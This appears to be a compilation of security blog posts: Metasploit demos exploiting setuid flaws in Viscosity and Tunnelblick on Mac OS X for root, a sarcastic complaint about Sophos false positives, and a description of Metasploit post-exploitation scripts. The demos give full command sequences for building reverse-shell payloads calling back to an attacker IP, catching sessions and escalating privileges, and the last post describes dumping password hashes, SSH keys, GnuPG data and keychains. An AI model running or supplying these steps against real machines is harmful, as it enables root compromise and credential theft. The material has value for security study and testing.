CVE-2012-4284 Setuid Viscosity Privilege Escalation Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Jason A. Donenfeld the 2012-08-11
Vulnerability corrected by the vendor the 2012-08-30
Metasploit PoC provided the 2013-03-03

PoC provided by :

Jason A. Donenfeld
juan vazquez

Reference(s) :

CVE-2012-4284
OSVDB-84709

Affected version(s) :

Viscosity 1.4.1 and earlier

Tested on Mac OS X 10.7.5 x64 with :

Viscosity 1.4.1

Description :

This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The vulnerability exists in the setuid ViscosityHelper, where an insufficient validation of path names allows execution of arbitrary python code as root. This module has been tested successfully on Viscosity 1.4.1 over Mac OS X 10.7.5.

Commands :

Create a OS X x86 payload with msfpayload
msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > osx-payload

Upload this payload on the victim OS X 10.7.5

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

Execute osx-payload, a session will be created.
This session runs with current user privileges.

use exploit/osx/local/setuid_viscosity
set SESSION 1
set PAYLOAD osx/x86/shell_reverse_tcp
set LPORT 4445
set LHOST 192.168.178.26
exploit

id

CVE-2012-3485 Setuid Tunnelblick Privilege Escalation Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Jason A. Donenfeld the 2012-08-11
Metasploit PoC provided the 2013-03-03

PoC provided by :

Jason A. Donenfeld
juan vazquez

Reference(s) :

CVE-2012-3485

Affected version(s) :

Tunnelblick 3.2.8 and previous

Tested on Mac OS X 10.7.5 x64 with :

Tunnelblick 3.2.8

Description :

This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid openvpnstart, where an insufficient validation of path names allows execution of arbitrary shell scripts as root. This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 over Mac OS X 10.7.5.

Commands :

Create a OS X x86 payload with msfpayload
msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > osx-payload

Upload this payload on the victim OS X 10.7.5

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

Execute osx-payload, a session will be created.
This session runs with current user privileges.

use exploit/osx/local/setuid_tunnelblick
set SESSION 1
set PAYLOAD osx/x86/shell_reverse_tcp
set LPORT 4445
set LHOST 192.168.178.26
exploit

id

10 of 10 malwares detected by Mac Sophos Anti-Virus are false positives. Does yours?

On April 24, Sophos Naked Security blog had publish a post regarding malware infections on Mac OS X. Sophos has claim that 20% of Mac computers where carrying one or more instances of Windows malwares. All these malwares where detected though they’re free Sophos Anti-Virus for Mac Home Edition.

Flashback malware was the big story of April for Mac consumers and all anti-virus company have jump on this opportunity to promote they’re products and to distill propaganda around Mac OS X security. I agree with them Mac OS X is a product like other product, and Mac OS X has also to be protected against threats, but the proposed solutions are worse than to do nothing.

 

During my tests of Sophos Anti-Virus for Mac Home Edition 10 of 10 malwares detected by the anti-virus were false positives harassing me with constant alert pop-up during regular operations, Spotlight indexing, Time Machine backup. Here under a sample of 10 infections detected by Sophos Anti-Virus for Mac.

Perl/FtpExp-A

False positives due to binary format of the “affected” files.

/Users/xxxx/Library/Saved Application State/com.twitter.twitter-mac.savedState/window_1.data
/Users/xxxx/Library/Preferences/Macromedia/Flash Player/macromedia.com/support/flashplayer/sys/#s.ytimg.com/settings.sol

Troj/BredoZp-JO

Sophos him self is a trojan, and some iTunes applications and Chrome are backdoored and nobody known about it.

/Library/Preferences/com.sophos.sav.plist
/Users/xxxx/Music/iTunes/iTunes Media/Mobile Applications/iSSH 5.3.1.ipa
/Users/xxxx/Library/Saved Application State/com.google.Chrome.savedState/windows.plist

Troj/BredoZp-JN

iTunes is a very well-known backdoored software and one more time Sophos him self contain a trojan.

/Users/xxxx/Library/Caches/com.apple.iTunes/goog-phish-shavar.db
/Library/Preferences/com.sophos.sav.plist

Troj/Iframe-HY

One more time Sophos is a trojan, and now my Spotlight indexed files are also containing backdoor.

/Library/Preferences/com.sophos.sav.plist,
/Volumes/xxxx/.Spotlight-V100/Store-V2/700BF07C-170F-482E-A2BB-45EF8501935C/0.indexPostings

Mal/IRCBot-O 

VLC is containing an IRC bot, gotcha remote control of all VLC users.

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Troj/PhpShell-Z

One more time VLC how is containing a PHP trojan …

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Mal/PHPShell-A 

Everybody know that Sophos Anti-Virus products are developed in PHP.

/Library/Preferences/com.sophos.sav.plist

Troj/PDFJs-B 

Help my logs are containing trojans and Sophos one more time.

/private/var/log/DiagnosticMessages/2012.05.05.asl
/Library/Preferences/com.sophos.sav.plist

Mal/Badsrc-C

My Spotlight indexing has a dead malware…

/.Spotlight-V100/Store-V2/DeadFiles/orphan.ef786332/0000/0000/0151/22087716.txt

Troj/PhoexRef-A

Hu my screenshot of Metasploit are containing trojans (why not, lol) and Google drive is backdoored.

/Users/xxxx/Desktop/screenshots/metasploit-vmware-modules-research.png
/Users/xxxx/Library/Application Support/Google/Drive/sync_config.db
/usr/share/zoneinfo/UTC
/Library/Preferences/com.sophos.sav.plist

In conclusion Sophos is more strong to do marketing and give fear to consumers than to create a good Mac anti-virus that really detect something.

Metasploit Mac OS X Post Exploitation : Enumeration and Hash Dump

As always, Carlos Perez aka Dark Operator, member of the PaulDotCom crew and Metasploit developer, is inspired. A new set of post exploitation scripts have been developed and integrated in the Metasploit framework repository. These scripts permit you to gather interesting information’s on a Mac OS X target.

These Metasploit post exploitation scripts are supporting version 10.3, 10.4, 10.510.6 and 10.7 of Mac OS X. For the moment are only working with a “shell” payload but Carlos is working on a version how is supporting a complete integration with meterpreter. Also Carlos is working on an iOS integration.

Mac OS X enum_osx post exploitation script

This script will permit you to gather available data types by automating the execution of the “/usr/sbin/system_profiler” command. Depending on your Mac OS X version, you will have more or less available data types. Here under some examples :

  • SPSoftwareDataType : Everything related to system software (system version, kernel version, boot volume, boot mode, computer name, user name, time since boot and if secure virtual memory is enabled).
  • SPNetworkDataType : Every thing related to the networks configurations (IPs, networks, gateways, configuration methods, proxies, Mac addresses, etc.).
  • SPBluetoothDataType : All informations related to the Bluetooth configuration (shared folders, authentication requirements, etc).
  • SPEthernetDataType : All informations related to ethernet cards (bus, vendor and device ID, vendor and device subsystem ID, revision ID, BSD name, Kext name, location and version).
  • SPAirPortDataType : All informations related to the Airport configuration (model, firmware version, current wireless network and channel).
  • SPNetworkLocationDataType : More detailed information’s on the networks configurations.
  • SPUSBDataType : All informations on the USB bus and connected devices.
  • SPPrintersDataType : All informations on local or remote configured printers.
  • SPFirewallDataType : All informations related to the local Firewall (Firewall mode, authorized applications, logging mode and stealth mode).
  • SPApplicationsDataType : All informations on all installed software’s (version, last modification date, location, etc.).
  • SPDeveloperToolsDataType : All informations on the installed development tools.
  • SPFrameworksDataType : All informations on the Apple Frameworks (version, last modification date, location, etc.).
  • SPStartupItemDataType : All informations on the start-up items (description, location, requirements, start-up order preferences).
  • SPPrefPaneDataType : All informations related to the preference panes (version, visible or not, identifier and location).
  • SPLogsDataType : All non rotated log files and they’re recent contents.

Also some others commands are executed to gather more information’s :

  • Current TCP connections (netstat -np tcp).
  • Current UDP connections (netstat -np udp).
  • Environment variables (printenv).
  • Last boot time (who -b).
  • Current activity (who).
  • Process list (ps -ea).
  • List of all users (dscacheutil -q user).
  • List of all groups (dscacheutil -q group).
  • Download the “$HOME/.ssh/” folder contain.
  • Download the “$HOME/.gnupg/” folder contain.
  • Download the “$HOME/*_history” file.
  • Download users configured Keychains by “/usr/bin/security list-keychains” command.
  • Extract and download history files.
  • Take a screenshot of the current session in JPEG format.

Same as for the hasdump script, if the Metasploit session is running with the Mac OS X root privileges, the SHA, LM and/or NTLM users accounts passwords hash dumps will be download.

All gathered informations are saved into a “logs/post/enum_osx/hostname-date” folder located into your “$HOME/.msf3” folder.

Metasploit enum_osx post exploitation
Metasploit enum_osx post exploitation

Mac OS X hashdump post exploitation script

As described above this script will focus only to gather the Mac OS X users accounts SHA, LM and/or NTLM passwords hash dumps, and download everything on the Metasploit station. All gathered information’s are saved into a “logs/post/enum_osx/hostname-date” folder located into your “$HOME/.msf3” folder.

Metasploit OS X hashdump post exploitation
Metasploit OS X hashdump post exploitation

To test these scripts you only need to create an executable payload for Mac OS X and follow these steps.

First create the payload with msfpayload and upload it to the targeted Mac OS X.

sudo msfpayload osx/ppc/shell_reverse_tcp LHOST=192.168.178.21 LPORT=4444 X > test

Then in msfconsole, run the following commands.

use exploit/multi/handler
set PAYLOAD osx/ppc/shell_reverse_tcp
set LHOST 192.168.178.21
exploit -j

After on the targeted Mac OS X, execute the test payload

Or you could play with a valid Mac OS X system or application exploit. Here under a PoC video.